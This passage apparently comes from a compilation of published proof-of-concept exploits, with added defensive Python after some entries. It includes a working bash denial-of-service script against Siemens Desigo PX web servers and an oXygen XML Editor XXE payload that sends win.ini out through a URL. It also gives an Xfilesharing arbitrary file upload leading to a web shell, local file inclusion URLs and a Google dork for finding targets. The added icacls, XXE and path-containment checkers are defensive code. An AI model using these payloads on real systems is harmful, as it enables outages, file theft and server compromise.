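# Simple and granular rights that allow changing or replacing files (assumption,
# from the icacls rights abbreviations).
WRITE_RIGHTS = {"F", "M", "W", "D",
                "WD", "AD", "WEA", "DC", "DE", "WDAC", "WO", "GW", "GA"}


def parse_icacls(output: str, path: str) -> list:
    """Return (principal, inheritance_flags, rights) for each ACE of one path."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):           # first line: path and first ACE share it
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:                           # blank line or the summary line
            continue
        inherit = re.findall(r"\(([A-Z]+)\)", m.group("inherit"))
        rights = m.group("rights").strip("()").split(",")
        aces.append((m.group("principal"), inherit, rights))
    return aces


def grants_write(rights: list) -> bool:
    return any(r in WRITE_RIGHTS for r in rights)


def weak_aces(aces: list) -> list:
    """ACEs that let every local user modify the directory tree."""
    return [ace for ace in aces
            if ace[0].lower() in LOW_PRIV and grants_write(ace[2])]


if __name__ == "__main__":
    for principal, inherit, rights in weak_aces(parse_icacls(SAMPLE_ICACLS, PATH)):
        propagates = "OI" in inherit or "CI" in inherit
        print(f"WEAK: {principal} has {','.join(rights)} on {PATH} "
              f"(propagates to children: {propagates})")
```

`(OI)(CI)` on a weak ACE is what turns a directory finding into an executable-replacement finding: new and existing files under the directory inherit it, which is exactly what the PoC relies on when it renames `ScanGuard.exe` and copies itself into its place.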
23. # Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
# Author: LiquidWorm
# Date: 2019-11-14
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version: 6.00
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
#                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC00-U, PXC64-U, PXC128-U
#                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
#                   With activated web server
#                   All firmware versions < V6.00.320
# CVE: N/A
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php

#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#
#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#

echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"

if [ "$#" -ne 1 ]; then
    echo -ne "\nUsage: $0 [ipaddr]\n\n"
    exit
fi

IP=$1
TARGET="http://$IP/"
# "dir?dir=../../" encoded byte by byte
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`

echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')

if [ "$status" == "404" ]; then
    echo -ne "\n[*] Exploit successful!\n"
else
    echo -ne "\n[-] Exploit unsuccessful.\n"
    exit
fi
24. # Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source: https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000

1.1- Poc.xml :

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2.- payload.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;

2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9
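The PoC works because the editor's parser resolves the `SYSTEM` parameter entities in the internal DTD subset, fetches `payload.dtd`, and then expands `&send;`, which carries the contents of `win.ini` out in a URL. The Python below is an added example, not oXygen's code or the author's: it uses the standard-library expat bindings to enumerate every external entity a document declares and to refuse the fetch before it happens, and wraps that in a parse-only-if-clean helper. `POC_XML` is the Poc.xml above embedded inline; the parameter-entity mode is set to "always" so that the `%dtd;` reference reaches the fetch callback instead of being silently skipped.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# The Poc.xml from the post above, embedded as bytes.
POC_XML = b"""<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\\Windows\\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""


def find_external_entities(data: bytes) -> list:
    """Return every entity declared with a SYSTEM or PUBLIC identifier and
    record (without performing) any attempt to fetch one. Nothing is read
    from disk or the network: the fetch callback returns 0, which makes expat
    raise and stop at that point."""
    found = []
    parser = expat.ParserCreate()
    # Process parameter-entity references so that `%dtd;` reaches the
    # external-entity callback instead of being skipped.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found.append({"name": name, "parameter": bool(is_param),
                          "system_id": system_id, "public_id": public_id,
                          "fetch_attempted": False})

    def on_external_ref(context, base, system_id, public_id):
        for entity in found:
            if entity["system_id"] == system_id:
                entity["fetch_attempted"] = True   # the step the PoC relies on
        return 0                                    # refuse: expat raises and stops

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass                                        # refused fetch or undefined &send;
    return found


def parse_if_safe(data: bytes):
    """Parse only documents that declare no external entities at all."""
    external = find_external_entities(data)
    if external:
        names = ", ".join(e["name"] for e in external)
        raise ValueError(f"refusing document with external entities: {names}")
    return ET.fromstring(data)


if __name__ == "__main__":
    for entity in find_external_entities(POC_XML):
        print(entity)
    try:
        parse_if_safe(POC_XML)
    except ValueError as exc:
        print(exc)
```

Refusing any document with a `SYSTEM`/`PUBLIC` entity is the right default for a desktop editor or a service that never legitimately needs them; the pre-scan matters because some parsers fetch external subsets before the application ever sees the tree.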
25. # Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952

##################### Arbitrary File Upload #####################

<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>

Shell : http://xyz.com/cgi-bin/temp/joe/shell.php

#################### Local File Inclusion ####################

http://xyz.com/?op=page&tmpl=../../admin_settings

This URL will fetch the "admin_settings.html" template without any authentication. The ".html" extension is hard-coded on the server, so the included file must have an html extension, but it can be anywhere on the server.

You can even merge the LFI with the Arbitrary File Upload vulnerability by uploading an html file, i.e. "upload.html", and changing the "sid" to "../../../../../../tmp", so the file gets uploaded to the tmp directory of the server. Now you can include the file like the following.

http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload

The Xfilesharing script has builtin shortcodes as well, so you can achieve RCE by including them in that "upload.html" file.

Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
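The gSOAP request in item 20 (`GET /../../../../../../../../../etc/passwd`) and both Xfilesharing issues above (`tmpl=../../admin_settings` and `sid=../../../../../../tmp`) are path-containment failures: a client-controlled string is joined to a base directory without checking that the result stays beneath it. The Python below is an added example, not code from either project. It shows the containment check that both should have applied, with the page's own payloads as inputs, and for the upload case adds the session-id and filename restrictions that close the `sid` and `shell.php` halves of the finding. The base directories, the extension allowlist and the session-id format are assumptions.

```python
import os
import re
from urllib.parse import unquote

# Assumed layout: templates under TEMPLATE_ROOT, per-session uploads under UPLOAD_BASE.
TEMPLATE_ROOT = "/srv/www/templates"
UPLOAD_BASE = "/srv/www/cgi-bin/temp"
ALLOWED_UPLOAD_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}   # assumption
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")               # assumption


def resolve_under_root(root: str, user_path: str, suffix: str = ""):
    """Join user_path (plus a server-side suffix such as '.html') to root and
    return the real path, or None if it escapes root. Percent-decoding first
    means '%2e%2e' is treated as '..'; realpath collapses '..' and symlinks,
    and an absolute user_path is caught because join() lets it replace root."""
    decoded = unquote(user_path)
    if "\x00" in decoded:                        # would truncate in C-level APIs
        return None
    decoded = decoded.replace("\\", "/")         # Windows separators count too
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded + suffix))
    if candidate == root_real or candidate.startswith(root_real + os.sep):
        return candidate
    return None


def template_path(tmpl: str):
    """What ?op=page&tmpl= should do: the page name may select a file under
    the template directory only, and only with the fixed .html suffix."""
    return resolve_under_root(TEMPLATE_ROOT, tmpl, ".html")


def safe_upload_path(base: str, sid: str, filename: str):
    """Upload destination: sid must be a plain token, the filename is reduced
    to its basename, the extension must be allowlisted (so no .php, .html or
    .cgi ever lands under a web-served directory), and the final path is
    re-checked against base rather than trusted."""
    if not SESSION_ID_RE.match(sid):
        return None
    name = os.path.basename(filename.replace("\\", "/"))
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if not name or name.startswith(".") or ext not in ALLOWED_UPLOAD_EXT:
        return None
    return resolve_under_root(base, f"{sid}/{name}")


if __name__ == "__main__":
    for tmpl in ("pages/index", "../../admin_settings", "%2e%2e/%2e%2e/admin_settings"):
        print(f"tmpl={tmpl!r:34} -> {template_path(tmpl)}")
    for sid, fn in (("joe", "shell.php"),
                    ("../../../../../../tmp", "upload.html"),
                    ("joe", "../report.pdf")):
        print(f"sid={sid!r}, file={fn!r} -> {safe_upload_path(UPLOAD_BASE, sid, fn)}")
```

The order matters: decode, then normalise, then compare against the real root. Checking for `..` as a substring before decoding is the mistake that lets `%2e%2e` and backslash variants through, and checking the string prefix without `realpath` is what lets a symlink under the root point outside it.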